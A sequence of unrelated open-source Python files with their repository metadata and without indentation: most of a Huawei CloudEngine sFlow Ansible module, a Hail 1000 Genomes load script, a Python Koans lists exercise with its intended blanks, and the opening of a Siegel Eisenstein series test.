"""get the type of interface, such as 10GE, ETH-TRUNK, VLANIF..."""
if interface is None:
return None
if interface.upper().startswith('GE'):
iftype = 'ge'
elif interface.upper().startswith('10GE'):
iftype = '10ge'
elif interface.upper().startswith('25GE'):
iftype = '25ge'
elif interface.upper().startswith('4X10GE'):
iftype = '4x10ge'
elif interface.upper().startswith('40GE'):
iftype = '40ge'
elif interface.upper().startswith('100GE'):
iftype = '100ge'
elif interface.upper().startswith('VLANIF'):
iftype = 'vlanif'
elif interface.upper().startswith('LOOPBACK'):
iftype = 'loopback'
elif interface.upper().startswith('METH'):
iftype = 'meth'
elif interface.upper().startswith('ETH-TRUNK'):
iftype = 'eth-trunk'
elif interface.upper().startswith('VBDIF'):
iftype = 'vbdif'
elif interface.upper().startswith('NVE'):
iftype = 'nve'
elif interface.upper().startswith('TUNNEL'):
iftype = 'tunnel'
elif interface.upper().startswith('ETHERNET'):
iftype = 'ethernet'
elif interface.upper().startswith('FCOE-PORT'):
iftype = 'fcoe-port'
elif interface.upper().startswith('FABRIC-PORT'):
iftype = 'fabric-port'
elif interface.upper().startswith('STACK-PORT'):
iftype = 'stack-port'
elif interface.upper().startswith('NULL'):
iftype = 'null'
else:
return None
return iftype.lower()
def get_rate_limit(config):
"""get sflow management-plane export rate-limit info"""
get = re.findall(r"sflow management-plane export rate-limit ([0-9]+) slot ([0-9]+)", config)
if not get:
get = re.findall(r"sflow management-plane export rate-limit ([0-9]+)", config)
if not get:
return None
else:
return dict(rate_limit=get[0])
else:
limit = list()
for slot in get:
limit.append(dict(rate_limit=slot[0], slot_id=slot[1]))
return limit
def get_forward_enp(config):
"""get assign forward enp sflow enable slot info"""
get = re.findall(r"assign forward enp sflow enable slot (\S+)", config)
if not get:
return None
else:
return list(get)
class Sflow(object):
"""Manages sFlow"""
def __init__(self, argument_spec):
self.spec = argument_spec
self.module = None
self.__init_module__()
# module input info
self.agent_ip = self.module.params['agent_ip']
self.agent_version = None
self.source_ip = self.module.params['source_ip']
self.source_version = None
self.export_route = self.module.params['export_route']
self.rate_limit = self.module.params['rate_limit']
self.rate_limit_slot = self.module.params['rate_limit_slot']
self.forward_enp_slot = self.module.params['forward_enp_slot']
self.collector_id = self.module.params['collector_id']
self.collector_ip = self.module.params['collector_ip']
self.collector_version = None
self.collector_ip_vpn = self.module.params['collector_ip_vpn']
self.collector_datagram_size = self.module.params['collector_datagram_size']
self.collector_udp_port = self.module.params['collector_udp_port']
self.collector_meth = self.module.params['collector_meth']
self.collector_description = self.module.params['collector_description']
self.sflow_interface = self.module.params['sflow_interface']
self.sample_collector = self.module.params['sample_collector'] or list()
self.sample_rate = self.module.params['sample_rate']
self.sample_length = self.module.params['sample_length']
self.sample_direction = self.module.params['sample_direction']
self.counter_collector = self.module.params['counter_collector'] or list()
self.counter_interval = self.module.params['counter_interval']
self.state = self.module.params['state']
# state
self.config = "" # current config
self.sflow_dict = dict()
self.changed = False
self.updates_cmd = list()
self.commands = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def __init_module__(self):
"""init module"""
required_together = [("collector_id", "collector_ip")]
self.module = AnsibleModule(
argument_spec=self.spec, required_together=required_together, supports_check_mode=True)
def check_response(self, con_obj, xml_name):
"""Check if response message is already succeed"""
xml_str = con_obj.xml
if "<ok/>" not in xml_str:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def netconf_set_config(self, xml_str, xml_name):
"""netconf set config"""
rcv_xml = set_nc_config(self.module, xml_str)
if "<ok/>" not in rcv_xml:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def cli_load_config(self, commands):
"""load config by cli"""
if not self.module.check_mode:
load_config(self.module, commands)
def get_current_config(self):
"""get current configuration"""
flags = list()
exp = ""
if self.rate_limit:
exp += "assign sflow management-plane export rate-limit %s" % self.rate_limit
if self.rate_limit_slot:
exp += " slot %s" % self.rate_limit_slot
exp += "$"
if self.forward_enp_slot:
if exp:
exp += "|"
exp += "assign forward enp sflow enable slot %s$" % self.forward_enp_slot
if exp:
exp = " | ignore-case include " + exp
flags.append(exp)
return get_config(self.module, flags)
else:
return ""
def cli_add_command(self, command, undo=False):
"""add command to self.update_cmd and self.commands"""
if undo and command.lower() not in ["quit", "return"]:
cmd = "undo " + command
else:
cmd = command
self.commands.append(cmd) # set to device
if command.lower() not in ["quit", "return"]:
self.updates_cmd.append(cmd) # show updates result
def get_sflow_dict(self):
""" sflow config dict"""
sflow_dict = dict(source=list(), agent=dict(), collector=list(),
sampling=dict(), counter=dict(), export=dict())
conf_str = CE_NC_GET_SFLOW % (
self.sflow_interface, self.sflow_interface)
if not self.collector_meth:
conf_str = conf_str.replace("<meth></meth>", "")
rcv_xml = get_nc_config(self.module, conf_str)
if "<data/>" in rcv_xml:
return sflow_dict
xml_str = rcv_xml.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
root = ElementTree.fromstring(xml_str)
# get source info
srcs = root.findall("data/sflow/sources/source")
if srcs:
for src in srcs:
attrs = dict()
for attr in src:
if attr.tag in ["family", "ipv4Addr", "ipv6Addr"]:
attrs[attr.tag] = attr.text
sflow_dict["source"].append(attrs)
# get agent info
agent = root.find("data/sflow/agents/agent")
if agent:
for attr in agent:
if attr.tag in ["family", "ipv4Addr", "ipv6Addr"]:
sflow_dict["agent"][attr.tag] = attr.text
# get collector info
collectors = root.findall("data/sflow/collectors/collector")
if collectors:
for collector in collectors:
attrs = dict()
for attr in collector:
if attr.tag in ["collectorID", "family", "ipv4Addr", "ipv6Addr",
"vrfName", "datagramSize", "port", "description", "meth"]:
attrs[attr.tag] = attr.text
sflow_dict["collector"].append(attrs)
# get sampling info
sample = root.find("data/sflow/samplings/sampling")
if sample:
for attr in sample:
if attr.tag in ["ifName", "collectorID", "direction", "length", "rate"]:
sflow_dict["sampling"][attr.tag] = attr.text
# get counter info
counter = root.find("data/sflow/counters/counter")
if counter:
for attr in counter:
if attr.tag in ["ifName", "collectorID", "interval"]:
sflow_dict["counter"][attr.tag] = attr.text
# get export info
export = root.find("data/sflow/exports/export")
if export:
for attr in export:
if attr.tag == "ExportRoute":
sflow_dict["export"][attr.tag] = attr.text
return sflow_dict
def config_agent(self):
"""configures sFlow agent"""
xml_str = ''
if not self.agent_ip:
return xml_str
self.agent_version = get_ip_version(self.agent_ip)
if not self.agent_version:
self.module.fail_json(msg="Error: agent_ip is invalid.")
if self.state == "present":
if self.agent_ip != self.sflow_dict["agent"].get("ipv4Addr") \
and self.agent_ip != self.sflow_dict["agent"].get("ipv6Addr"):
xml_str += '<agents><agent operation="merge">'
xml_str += '<family>%s</family>' % self.agent_version
if self.agent_version == "ipv4":
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.agent_ip
self.updates_cmd.append("sflow agent ip %s" % self.agent_ip)
else:
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.agent_ip
self.updates_cmd.append("sflow agent ipv6 %s" % self.agent_ip)
xml_str += '</agent></agents>'
else:
if self.agent_ip == self.sflow_dict["agent"].get("ipv4Addr") \
or self.agent_ip == self.sflow_dict["agent"].get("ipv6Addr"):
xml_str += '<agents><agent operation="delete"></agent></agents>'
self.updates_cmd.append("undo sflow agent")
return xml_str
def config_source(self):
"""configures the source IP address for sFlow packets"""
xml_str = ''
if not self.source_ip:
return xml_str
self.source_version = get_ip_version(self.source_ip)
if not self.source_version:
self.module.fail_json(msg="Error: source_ip is invalid.")
src_dict = dict()
for src in self.sflow_dict["source"]:
if src.get("family") == self.source_version:
src_dict = src
break
if self.state == "present":
if self.source_ip != src_dict.get("ipv4Addr") \
and self.source_ip != src_dict.get("ipv6Addr"):
xml_str += '<sources><source operation="merge">'
xml_str += '<family>%s</family>' % self.source_version
if self.source_version == "ipv4":
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.source_ip
self.updates_cmd.append("sflow source ip %s" % self.source_ip)
else:
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.source_ip
self.updates_cmd.append(
"sflow source ipv6 %s" % self.source_ip)
xml_str += '</source ></sources>'
else:
if self.source_ip == src_dict.get("ipv4Addr"):
xml_str += '<sources><source operation="delete"><family>ipv4</family></source ></sources>'
self.updates_cmd.append("undo sflow source ip %s" % self.source_ip)
elif self.source_ip == src_dict.get("ipv6Addr"):
xml_str += '<sources><source operation="delete"><family>ipv6</family></source ></sources>'
self.updates_cmd.append("undo sflow source ipv6 %s" % self.source_ip)
return xml_str
def config_collector(self):
"""creates an sFlow collector and sets or modifies optional parameters for the sFlow collector"""
xml_str = ''
if not self.collector_id:
return xml_str
if self.state == "present" and not self.collector_ip:
return xml_str
if self.collector_ip:
self.collector_version = get_ip_version(self.collector_ip)
if not self.collector_version:
self.module.fail_json(msg="Error: collector_ip is invalid.")
# get collector dict
exist_dict = dict()
for collector in self.sflow_dict["collector"]:
if collector.get("collectorID") == self.collector_id:
exist_dict = collector
break
change = False
if self.state == "present":
if not exist_dict:
change = True
elif self.collector_version != exist_dict.get("family"):
change = True
elif self.collector_version == "ipv4" and self.collector_ip != exist_dict.get("ipv4Addr"):
change = True
elif self.collector_version == "ipv6" and self.collector_ip != exist_dict.get("ipv6Addr"):
change = True
elif self.collector_ip_vpn and self.collector_ip_vpn != exist_dict.get("vrfName"):
change = True
elif not self.collector_ip_vpn and exist_dict.get("vrfName") != "_public_":
change = True
elif self.collector_udp_port and self.collector_udp_port != exist_dict.get("port"):
change = True
elif not self.collector_udp_port and exist_dict.get("port") != "6343":
change = True
elif self.collector_datagram_size and self.collector_datagram_size != exist_dict.get("datagramSize"):
change = True
elif not self.collector_datagram_size and exist_dict.get("datagramSize") != "1400":
change = True
elif self.collector_meth and self.collector_meth != exist_dict.get("meth"):
change = True
elif not self.collector_meth and exist_dict.get("meth") and exist_dict.get("meth") != "meth":
change = True
elif self.collector_description and self.collector_description != exist_dict.get("description"):
change = True
elif not self.collector_description and exist_dict.get("description"):
change = True
else:
pass
else: # absent
# collector not exist
if not exist_dict:
return xml_str
if self.collector_version and self.collector_version != exist_dict.get("family"):
return xml_str
if self.collector_version == "ipv4" and self.collector_ip != exist_dict.get("ipv4Addr"):
return xml_str
if self.collector_version == "ipv6" and self.collector_ip != exist_dict.get("ipv6Addr"):
return xml_str
if self.collector_ip_vpn and self.collector_ip_vpn != exist_dict.get("vrfName"):
return xml_str
if self.collector_udp_port and self.collector_udp_port != exist_dict.get("port"):
return xml_str
if self.collector_datagram_size and self.collector_datagram_size != exist_dict.get("datagramSize"):
return xml_str
if self.collector_meth and self.collector_meth != exist_dict.get("meth"):
return xml_str
if self.collector_description and self.collector_description != exist_dict.get("description"):
return xml_str
change = True
if not change:
return xml_str
# update or delete
if self.state == "absent":
xml_str += '<collectors><collector operation="delete"><collectorID>%s</collectorID>' % self.collector_id
self.updates_cmd.append("undo collector %s" % self.collector_id)
else:
xml_str += '<collectors><collector operation="merge"><collectorID>%s</collectorID>' % self.collector_id
cmd = "sflow collector %s" % self.collector_id
xml_str += '<family>%s</family>' % self.collector_version
if self.collector_version == "ipv4":
cmd += " ip %s" % self.collector_ip
xml_str += '<ipv4Addr>%s</ipv4Addr>' % self.collector_ip
else:
cmd += " ipv6 %s" % self.collector_ip
xml_str += '<ipv6Addr>%s</ipv6Addr>' % self.collector_ip
if self.collector_ip_vpn:
cmd += " vpn-instance %s" % self.collector_ip_vpn
xml_str += '<vrfName>%s</vrfName>' % self.collector_ip_vpn
if self.collector_datagram_size:
cmd += " length %s" % self.collector_datagram_size
xml_str += '<datagramSize>%s</datagramSize>' % self.collector_datagram_size
if self.collector_udp_port:
cmd += " udp-port %s" % self.collector_udp_port
xml_str += '<port>%s</port>' % self.collector_udp_port
if self.collector_description:
cmd += " description %s" % self.collector_description
xml_str += '<description>%s</description>' % self.collector_description
else:
xml_str += '<description></description>'
if self.collector_meth:
if self.collector_meth == "enhanced":
cmd += " enhanced"
xml_str += '<meth>%s</meth>' % self.collector_meth
self.updates_cmd.append(cmd)
xml_str += "</collector></collectors>"
return xml_str
def config_sampling(self):
"""configure sflow sampling on an interface"""
xml_str = ''
if not self.sflow_interface:
return xml_str
if not self.sflow_dict["sampling"] and self.state == "absent":
return xml_str
self.updates_cmd.append("interface %s" % self.sflow_interface)
if self.state == "present":
xml_str += '<samplings><sampling operation="merge"><ifName>%s</ifName>' % self.sflow_interface
else:
xml_str += '<samplings><sampling operation="delete"><ifName>%s</ifName>' % self.sflow_interface
# sample_collector
if self.sample_collector:
if self.sflow_dict["sampling"].get("collectorID") \
and self.sflow_dict["sampling"].get("collectorID") != "invalid":
existing = self.sflow_dict["sampling"].get("collectorID").split(',')
else:
existing = list()
if self.state == "present":
diff = list(set(self.sample_collector) - set(existing))
if diff:
self.updates_cmd.append(
"sflow sampling collector %s" % ' '.join(diff))
new_set = list(self.sample_collector + existing)
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(new_set)))
else:
same = list(set(self.sample_collector) & set(existing))
if same:
self.updates_cmd.append(
"undo sflow sampling collector %s" % ' '.join(same))
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(same)))
# sample_rate
if self.sample_rate:
exist = bool(self.sample_rate == self.sflow_dict["sampling"].get("rate"))
if self.state == "present" and not exist:
self.updates_cmd.append(
"sflow sampling rate %s" % self.sample_rate)
xml_str += '<rate>%s</rate>' % self.sample_rate
elif self.state == "absent" and exist:
self.updates_cmd.append(
"undo sflow sampling rate %s" % self.sample_rate)
xml_str += '<rate>%s</rate>' % self.sample_rate
# sample_length
if self.sample_length:
exist = bool(self.sample_length == self.sflow_dict["sampling"].get("length"))
if self.state == "present" and not exist:
self.updates_cmd.append(
"sflow sampling length %s" % self.sample_length)
xml_str += '<length>%s</length>' % self.sample_length
elif self.state == "absent" and exist:
self.updates_cmd.append(
"undo sflow sampling length %s" % self.sample_length)
xml_str += '<length>%s</length>' % self.sample_length
# sample_direction
if self.sample_direction:
direction = list()
if self.sample_direction == "both":
direction = ["inbound", "outbound"]
else:
direction.append(self.sample_direction)
existing = list()
if self.sflow_dict["sampling"].get("direction"):
if self.sflow_dict["sampling"].get("direction") == "both":
existing = ["inbound", "outbound"]
else:
existing.append(
self.sflow_dict["sampling"].get("direction"))
if self.state == "present":
diff = list(set(direction) - set(existing))
if diff:
new_set = list(set(direction + existing))
self.updates_cmd.append(
"sflow sampling %s" % ' '.join(diff))
if len(new_set) > 1:
new_dir = "both"
else:
new_dir = new_set[0]
xml_str += '<direction>%s</direction>' % new_dir
else:
same = list(set(existing) & set(direction))
if same:
self.updates_cmd.append("undo sflow sampling %s" % ' '.join(same))
if len(same) > 1:
del_dir = "both"
else:
del_dir = same[0]
xml_str += '<direction>%s</direction>' % del_dir
if xml_str.endswith("</ifName>"):
self.updates_cmd.pop()
return ""
xml_str += '</sampling></samplings>'
return xml_str
def config_counter(self):
"""configures sflow counter on an interface"""
xml_str = ''
if not self.sflow_interface:
return xml_str
if not self.sflow_dict["counter"] and self.state == "absent":
return xml_str
self.updates_cmd.append("interface %s" % self.sflow_interface)
if self.state == "present":
xml_str += '<counters><counter operation="merge"><ifName>%s</ifName>' % self.sflow_interface
else:
xml_str += '<counters><counter operation="delete"><ifName>%s</ifName>' % self.sflow_interface
# counter_collector
if self.counter_collector:
if self.sflow_dict["counter"].get("collectorID") \
and self.sflow_dict["counter"].get("collectorID") != "invalid":
existing = self.sflow_dict["counter"].get("collectorID").split(',')
else:
existing = list()
if self.state == "present":
diff = list(set(self.counter_collector) - set(existing))
if diff:
self.updates_cmd.append("sflow counter collector %s" % ' '.join(diff))
new_set = list(self.counter_collector + existing)
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(new_set)))
else:
same = list(set(self.counter_collector) & set(existing))
if same:
self.updates_cmd.append(
"undo sflow counter collector %s" % ' '.join(same))
xml_str += '<collectorID>%s</collectorID>' % ','.join(list(set(same)))
# counter_interval
if self.counter_interval:
exist = bool(self.counter_interval == self.sflow_dict["counter"].get("interval"))
if self.state == "present" and not exist:
self.updates_cmd.append(
"sflow counter interval %s" % self.counter_interval)
xml_str += '<interval>%s</interval>' % self.counter_interval
elif self.state == "absent" and exist:
self.updates_cmd.append(
"undo sflow counter interval %s" % self.counter_interval)
xml_str += '<interval>%s</interval>' % self.counter_interval
if xml_str.endswith("</ifName>"):
self.updates_cmd.pop()
return ""
xml_str += '</counter></counters>'
return xml_str
def config_export(self):
"""configure sflow export"""
xml_str = ''
if not self.export_route:
return xml_str
if self.export_route == "enable":
if self.sflow_dict["export"] and self.sflow_dict["export"].get("ExportRoute") == "disable":
xml_str = '<exports><export operation="delete"><ExportRoute>disable</ExportRoute></export></exports>'
self.updates_cmd.append("undo sflow export extended-route-data disable")
else: # disable
if not self.sflow_dict["export"] or self.sflow_dict["export"].get("ExportRoute") != "disable":
xml_str = '<exports><export operation="create"><ExportRoute>disable</ExportRoute></export></exports>'
self.updates_cmd.append("sflow export extended-route-data disable")
return xml_str
def config_assign(self):
"""configure assign"""
# assign sflow management-plane export rate-limit rate-limit [ slot slot-id ]
if self.rate_limit:
cmd = "assign sflow management-plane export rate-limit %s" % self.rate_limit
if self.rate_limit_slot:
cmd += " slot %s" % self.rate_limit_slot
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
self.cli_add_command(cmd, undo=True)
# assign forward enp sflow enable slot { slot-id | all }
if self.forward_enp_slot:
cmd = "assign forward enp sflow enable slot %s" % self.forward_enp_slot
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
self.cli_add_command(cmd, undo=True)
def netconf_load_config(self, xml_str):
"""load sflow config by netconf"""
if not xml_str:
return
xml_cfg = """
<config>
<sflow xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
%s
</sflow>
</config>""" % xml_str
self.netconf_set_config(xml_cfg, "SET_SFLOW")
self.changed = True
def check_params(self):
"""Check all input params"""
# check agent_ip
if self.agent_ip:
self.agent_ip = self.agent_ip.upper()
if not check_ip_addr(self.agent_ip):
self.module.fail_json(msg="Error: agent_ip is invalid.")
# check source_ip
if self.source_ip:
self.source_ip = self.source_ip.upper()
if not check_ip_addr(self.source_ip):
self.module.fail_json(msg="Error: source_ip is invalid.")
# check collector
if self.collector_id:
# check collector_ip and collector_ip_vpn
if self.collector_ip:
self.collector_ip = self.collector_ip.upper()
if not check_ip_addr(self.collector_ip):
self.module.fail_json(
msg="Error: collector_ip is invalid.")
if self.collector_ip_vpn and not is_valid_ip_vpn(self.collector_ip_vpn):
self.module.fail_json(
msg="Error: collector_ip_vpn is invalid.")
# check collector_datagram_size ranges from 1024 to 8100
if self.collector_datagram_size:
if not self.collector_datagram_size.isdigit():
self.module.fail_json(
msg="Error: collector_datagram_size is not digit.")
if int(self.collector_datagram_size) < 1024 or int(self.collector_datagram_size) > 8100:
self.module.fail_json(
msg="Error: collector_datagram_size is not ranges from 1024 to 8100.")
# check collector_udp_port ranges from 1 to 65535
if self.collector_udp_port:
if not self.collector_udp_port.isdigit():
self.module.fail_json(
msg="Error: collector_udp_port is not digit.")
if int(self.collector_udp_port) < 1 or int(self.collector_udp_port) > 65535:
self.module.fail_json(
msg="Error: collector_udp_port is not ranges from 1 to 65535.")
# check collector_description 1 to 255 case-sensitive characters
if self.collector_description:
if self.collector_description.count(" "):
self.module.fail_json(
msg="Error: collector_description should without spaces.")
if len(self.collector_description) < 1 or len(self.collector_description) > 255:
self.module.fail_json(
msg="Error: collector_description is not ranges from 1 to 255.")
# check sflow_interface
if self.sflow_interface:
intf_type = get_interface_type(self.sflow_interface)
if not intf_type:
self.module.fail_json(msg="Error: intf_type is invalid.")
if intf_type not in ['ge', '10ge', '25ge', '4x10ge', '40ge', '100ge', 'eth-trunk']:
self.module.fail_json(
msg="Error: interface %s is not support sFlow." % self.sflow_interface)
# check sample_collector
if self.sample_collector:
self.sample_collector.sort()
if self.sample_collector not in [["1"], ["2"], ["1", "2"]]:
self.module.fail_json(
msg="Error: sample_collector is invalid.")
# check sample_rate ranges from 1 to 4294967295
if self.sample_rate:
if not self.sample_rate.isdigit():
self.module.fail_json(
msg="Error: sample_rate is not digit.")
if int(self.sample_rate) < 1 or int(self.sample_rate) > 4294967295:
self.module.fail_json(
msg="Error: sample_rate is not ranges from 1 to 4294967295.")
# check sample_length ranges from 18 to 512
if self.sample_length:
if not self.sample_length.isdigit():
self.module.fail_json(
msg="Error: sample_rate is not digit.")
if int(self.sample_length) < 18 or int(self.sample_length) > 512:
self.module.fail_json(
msg="Error: sample_length is not ranges from 18 to 512.")
# check counter_collector
if self.counter_collector:
self.counter_collector.sort()
if self.counter_collector not in [["1"], ["2"], ["1", "2"]]:
self.module.fail_json(
msg="Error: counter_collector is invalid.")
# counter_interval ranges from 10 to 4294967295
if self.counter_interval:
if not self.counter_interval.isdigit():
self.module.fail_json(
msg="Error: counter_interval is not digit.")
if int(self.counter_interval) < 10 or int(self.counter_interval) > 4294967295:
self.module.fail_json(
msg="Error: sample_length is not ranges from 10 to 4294967295.")
# check rate_limit ranges from 100 to 1500 and check rate_limit_slot
if self.rate_limit:
if not self.rate_limit.isdigit():
self.module.fail_json(msg="Error: rate_limit is not digit.")
if int(self.rate_limit) < 100 or int(self.rate_limit) > 1500:
self.module.fail_json(
msg="Error: rate_limit is not ranges from 100 to 1500.")
if self.rate_limit_slot and not self.rate_limit_slot.isdigit():
self.module.fail_json(
msg="Error: rate_limit_slot is not digit.")
# check forward_enp_slot
if self.forward_enp_slot:
self.forward_enp_slot.lower()
if not self.forward_enp_slot.isdigit() and self.forward_enp_slot != "all":
self.module.fail_json(
msg="Error: forward_enp_slot is invalid.")
def get_proposed(self):
"""get proposed info"""
# base config
if self.agent_ip:
self.proposed["agent_ip"] = self.agent_ip
if self.source_ip:
self.proposed["source_ip"] = self.source_ip
if self.export_route:
self.proposed["export_route"] = self.export_route
if self.rate_limit:
self.proposed["rate_limit"] = self.rate_limit
self.proposed["rate_limit_slot"] = self.rate_limit_slot
if self.forward_enp_slot:
self.proposed["forward_enp_slot"] = self.forward_enp_slot
if self.collector_id:
self.proposed["collector_id"] = self.collector_id
if self.collector_ip:
self.proposed["collector_ip"] = self.collector_ip
self.proposed["collector_ip_vpn"] = self.collector_ip_vpn
if self.collector_datagram_size:
self.proposed[
"collector_datagram_size"] = self.collector_datagram_size
if self.collector_udp_port:
self.proposed["collector_udp_port"] = self.collector_udp_port
if self.collector_meth:
self.proposed["collector_meth"] = self.collector_meth
if self.collector_description:
self.proposed[
"collector_description"] = self.collector_description
# sample and counter config
if self.sflow_interface:
self.proposed["sflow_interface"] = self.sflow_interface
if self.sample_collector:
self.proposed["sample_collector"] = self.sample_collector
if self.sample_rate:
self.proposed["sample_rate"] = self.sample_rate
if self.sample_length:
self.proposed["sample_length"] = self.sample_length
if self.sample_direction:
self.proposed["sample_direction"] = self.sample_direction
if self.counter_collector:
self.proposed["counter_collector"] = self.counter_collector
if self.counter_interval:
self.proposed["counter_interval"] = self.counter_interval
self.proposed["state"] = self.state
def get_existing(self):
"""get existing info"""
if self.config:
if self.rate_limit:
self.existing["rate_limit"] = get_rate_limit(self.config)
if self.forward_enp_slot:
self.existing["forward_enp_slot"] = get_forward_enp(
self.config)
if not self.sflow_dict:
return
if self.agent_ip:
self.existing["agent"] = self.sflow_dict["agent"]
if self.source_ip:
self.existing["source"] = self.sflow_dict["source"]
if self.collector_id:
self.existing["collector"] = self.sflow_dict["collector"]
if self.export_route:
self.existing["export"] = self.sflow_dict["export"]
if self.sflow_interface:
self.existing["sampling"] = self.sflow_dict["sampling"]
self.existing["counter"] = self.sflow_dict["counter"]
def get_end_state(self):
"""get end state info"""
config = self.get_current_config()
if config:
if self.rate_limit:
self.end_state["rate_limit"] = get_rate_limit(config)
if self.forward_enp_slot:
self.end_state["forward_enp_slot"] = get_forward_enp(config)
sflow_dict = self.get_sflow_dict()
if not sflow_dict:
return
if self.agent_ip:
self.end_state["agent"] = sflow_dict["agent"]
if self.source_ip:
self.end_state["source"] = sflow_dict["source"]
if self.collector_id:
self.end_state["collector"] = sflow_dict["collector"]
if self.export_route:
self.end_state["export"] = sflow_dict["export"]
if self.sflow_interface:
self.end_state["sampling"] = sflow_dict["sampling"]
self.end_state["counter"] = sflow_dict["counter"]
def work(self):
"""worker"""
self.check_params()
self.sflow_dict = self.get_sflow_dict()
self.config = self.get_current_config()
self.get_existing()
self.get_proposed()
# deal present or absent
xml_str = ''
if self.export_route:
xml_str += self.config_export()
if self.agent_ip:
xml_str += self.config_agent()
if self.source_ip:
xml_str += self.config_source()
if self.state == "present":
if self.collector_id and self.collector_ip:
xml_str += self.config_collector()
if self.sflow_interface:
xml_str += self.config_sampling()
xml_str += self.config_counter()
else:
if self.sflow_interface:
xml_str += self.config_sampling()
xml_str += self.config_counter()
if self.collector_id:
xml_str += self.config_collector()
if self.rate_limit or self.forward_enp_slot:
self.config_assign()
if self.commands:
self.cli_load_config(self.commands)
self.changed = True
if xml_str:
self.netconf_load_config(xml_str)
self.changed = True
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
if self.changed:
self.results['updates'] = self.updates_cmd
else:
self.results['updates'] = list()
self.module.exit_json(**self.results)
def main():
"""Module main"""
argument_spec = dict(
agent_ip=dict(required=False, type='str'),
source_ip=dict(required=False, type='str'),
export_route=dict(required=False, type='str',
choices=['enable', 'disable']),
rate_limit=dict(required=False, type='str'),
rate_limit_slot=dict(required=False, type='str'),
forward_enp_slot=dict(required=False, type='str'),
collector_id=dict(required=False, type='str', choices=['1', '2']),
collector_ip=dict(required=False, type='str'),
collector_ip_vpn=dict(required=False, type='str'),
collector_datagram_size=dict(required=False, type='str'),
collector_udp_port=dict(required=False, type='str'),
collector_meth=dict(required=False, type='str',
choices=['meth', 'enhanced']),
collector_description=dict(required=False, type='str'),
sflow_interface=dict(required=False, type='str'),
sample_collector=dict(required=False, type='list'),
sample_rate=dict(required=False, type='str'),
sample_length=dict(required=False, type='str'),
sample_direction=dict(required=False, type='str',
choices=['inbound', 'outbound', 'both']),
counter_collector=dict(required=False, type='list'),
counter_interval=dict(required=False, type='str'),
state=dict(required=False, default='present',
choices=['present', 'absent'])
)
argument_spec.update(ce_argument_spec)
module = Sflow(argument_spec)
module.work()
if __name__ == '__main__':
main()
|
hail-is/hail
|
refs/heads/master
|
datasets/load/load.1000_Genomes_phase3_sites.GRCh37.py
|
3
|
import hail as hl
ht = hl.import_table(
'gs://hail-datasets-raw-data/1000_Genomes/1000_Genomes_phase3_sites_GRCh37.tsv.bgz',
reference_genome='GRCh37')
ht.describe()
|
realsagi/python_koans
|
refs/heads/master
|
python3/koans/about_lists.py
|
48
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutArrays in the Ruby Koans
#
from runner.koan import *
class AboutLists(Koan):
def test_creating_lists(self):
empty_list = list()
self.assertEqual(list, type(empty_list))
self.assertEqual(__, len(empty_list))
def test_list_literals(self):
nums = list()
self.assertEqual([], nums)
nums[0:] = [1]
self.assertEqual([1], nums)
nums[1:] = [2]
self.assertListEqual([1, __], nums)
nums.append(333)
self.assertListEqual([1, 2, __], nums)
def test_accessing_list_elements(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(__, noms[0])
self.assertEqual(__, noms[3])
self.assertEqual(__, noms[-1])
self.assertEqual(__, noms[-3])
def test_slicing_lists(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(__, noms[0:1])
self.assertEqual(__, noms[0:2])
self.assertEqual(__, noms[2:2])
self.assertEqual(__, noms[2:20])
self.assertEqual(__, noms[4:0])
self.assertEqual(__, noms[4:100])
self.assertEqual(__, noms[5:0])
def test_slicing_to_the_edge(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(__, noms[2:])
self.assertEqual(__, noms[:2])
def test_lists_and_ranges(self):
self.assertEqual(range, type(range(5)))
self.assertNotEqual([1, 2, 3, 4, 5], range(1,6))
self.assertEqual(__, list(range(5)))
self.assertEqual(__, list(range(5, 9)))
def test_ranges_with_steps(self):
self.assertEqual(__, list(range(0, 8, 2)))
self.assertEqual(__, list(range(1, 8, 3)))
self.assertEqual(__, list(range(5, -7, -4)))
self.assertEqual(__, list(range(5, -8, -4)))
def test_insertions(self):
knight = ['you', 'shall', 'pass']
knight.insert(2, 'not')
self.assertEqual(__, knight)
knight.insert(0, 'Arthur')
self.assertEqual(__, knight)
def test_popping_lists(self):
stack = [10, 20, 30, 40]
stack.append('last')
self.assertEqual(__, stack)
popped_value = stack.pop()
self.assertEqual(__, popped_value)
self.assertEqual(__, stack)
popped_value = stack.pop(1)
self.assertEqual(__, popped_value)
self.assertEqual(__, stack)
# Notice that there is a "pop" but no "push" in python?
# Part of the Python philosophy is that there ideally should be one and
# only one way of doing anything. A 'push' is the same as an 'append'.
# To learn more about this try typing "import this" from the python
# console... ;)
def test_making_queues(self):
queue = [1, 2]
queue.append('last')
self.assertEqual(__, queue)
popped_value = queue.pop(0)
self.assertEqual(__, popped_value)
self.assertEqual(__, queue)
# Note, popping from the left hand side of a list is
# inefficient. Use collections.deque instead.
|
stakemori/siegel_series
|
refs/heads/master
|
tests/fourier_coeff_low_degree2.py
|
1
|
import unittest
from sage.all import eisenstein_series_qexp, matrix, ZZ
from ..siegel_eisenstein import SiegelEisensteinSeries as sess
from degree2.all import eisenstein_series_degree2
class ForierCoeffsLowDegrees(unittest.TestCase):
def assert_degree_1(self, k):
es = eisenstein_series_qexp(k, prec=11, normalization="constant")
